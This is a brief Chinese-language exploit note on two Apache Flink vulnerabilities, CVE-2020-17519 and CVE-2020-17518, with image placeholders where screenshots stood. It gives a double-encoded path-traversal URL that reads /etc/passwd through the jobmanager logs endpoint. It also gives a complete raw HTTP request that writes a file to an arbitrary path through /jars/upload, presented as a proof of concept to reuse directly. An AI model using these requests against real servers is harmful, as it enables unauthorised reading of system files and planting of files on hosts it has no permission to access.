CVE-2020-17519

image

读取任意文件

    https://xx.xx.xx.xx/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd

image

CVE-2020-17518

直接复用poc

POST /jars/upload HTTP/1.1
Host: xx.xx.xx.xx
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Connection: close
Content-Type: multipart/form-data; boundary=--------721072898
Content-Length: 151

----------721072898
Content-Disposition: form-data; name="jarfile"; filename="../../../../../../../../tmp/test.txt"

testtest
----------721072898--

image

测试是否上传成功

image